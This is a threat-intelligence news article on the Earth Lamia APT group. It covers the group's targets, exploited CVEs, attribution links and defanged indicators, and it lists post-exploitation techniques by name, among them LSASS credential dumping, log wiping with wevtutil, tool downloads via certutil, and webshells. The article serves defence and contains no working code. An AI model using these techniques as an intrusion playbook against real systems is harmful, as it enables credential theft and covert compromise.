Trend Micro has released an in-depth report detailing a China-nexus advanced persistent threat (APT) group known as Earth Lamia, which has been conducting targeted cyber espionage campaigns across Brazil, India, and Southeast Asia since at least 2023. The group has aggressively shifted focus across industries over time, moving from financial sectors to logistics, retail, and now to IT firms, academic institutions, and government organizations in 2025.
Earth Lamia primarily exploits SQL injection vulnerabilities in public-facing web applications to infiltrate networks. Using automated tools such as sqlmap, they gain remote access to SQL servers and often execute commands to create new admin accounts, notably the "sysadmin123" user, to facilitate data exfiltration.
In addition to SQL injection, the group exploits a range of known vulnerabilities, including:
-
CVE-2017-9805: Apache Struts2 RCE
-
CVE-2021-22205: GitLab RCE
-
CVE-2024-9047: WordPress File Upload arbitrary access
-
CVE-2024-27198, CVE-2024-27199: JetBrains TeamCity auth bypass and path traversal
-
CVE-2024-51378, CVE-2024-51567: CyberPanel RCE
-
CVE-2024-56145: Craft CMS RCE
-
CVE-2025-31324: SAP NetWeaver unauthenticated file upload
These exploits enable Earth Lamia to establish initial access, after which they carry out extensive lateral movement within compromised environments.
Trend Micro observed Earth Lamia engaging in the following post-exploitation behaviors:
-
Downloading tools via certutil.exe and powershell.exe
-
Deploying webshells
-
Performing privilege escalation using tools like GodPotato, JuicyPotato, and a customized tool named BypassBoss (a modified version of Sharp4PrinterNotifyPotato)
-
Conducting internal reconnaissance using Fscan, Kscan, nltest.exe, and net.exe
-
Creating persistent user accounts such as “helpdesk” with admin privileges
-
Extracting credentials from LSASS, SAM, and SYSTEM hives
-
Cleaning logs with wevtutil.exe
-
Establishing covert channels using rakshasa and Stowaway
-
Executing backdoors from known C2 frameworks including Vshell, Cobalt Strike, and Brute Ratel
-
Using schtasks.exe to ensure persistence
-
Custom Tools and Stealth Enhancements
Earth Lamia is also known for modifying open-source tools to evade detection. The group strips out static strings, obfuscates essential metadata, and repackages tools as DLL files for DLL sideloading — often using legitimate binaries like AppLaunch.exe. In one case, this executable was used with arguments mimicking Mimikatz, suggesting attempts to extract credentials under the radar.
A signature development of Earth Lamia is its proprietary PULSEPACK backdoor first spotted in August 2024. A new 2025 version comes with enhanced C2 communication capabilities.
The intrusion set REF0657 that has been observed targeting South Asia's financial sector, is believed to be the work of Earth Lamia. The tactics and tools used in these attacks, including the use of "GodPotato" (as Sophosx64.exe) and a Cobalt Strike loader (USERENV.dll) developed via the MemoryEvasion project, align closely with known Earth Lamia activity.
A report on a Mimic ransomware campaign (STAC6451) revealed overlaps with REF0657, suggesting possible Earth Lamia involvement. However, STAC6451 also included tactics atypical of Earth Lamia, suggesting that the campaign involved multiple intrusion sets. Earth Lamia has not previously been observed using ransomware, though it’s possible they collaborated with the Mimic campaign or independently targeted the same systems.
By January 2025, researchers linked an espionage campaign (CL-STA-0048) to both DragonRank, a Chinese APT group, and REF0657 (Earth Lamia). While Earth Lamia and DragonRank are currently tracked as separate entities, a definitive link between them has not been ruled out.
In May 2025, a broader set of China-nexus APT campaigns exploiting CVE-2025-31324 was reported. One campaign used the Cobalt Strike C&C domain sentinelones[.]com, tied to CL-STA-0048 and possibly Earth Lamia. Another IP address (103[.]30[.]76[.]206), attributed to UNC5174 in the same report, is believed by researchers with high confidence to actually be operated by Earth Lamia.
“The original attribution to UNC5174 is based on the fact that the attacks delivered a VShell stager called SNOWLIGHT. The stager has been reported to be used by UNC5174,” the researchers noted. “However, this may not be reliable because SNOWLIGHT is also one of default stagers in the VShell framework. Anyone using the framework could generate the stager to load their VShell backdoor.”
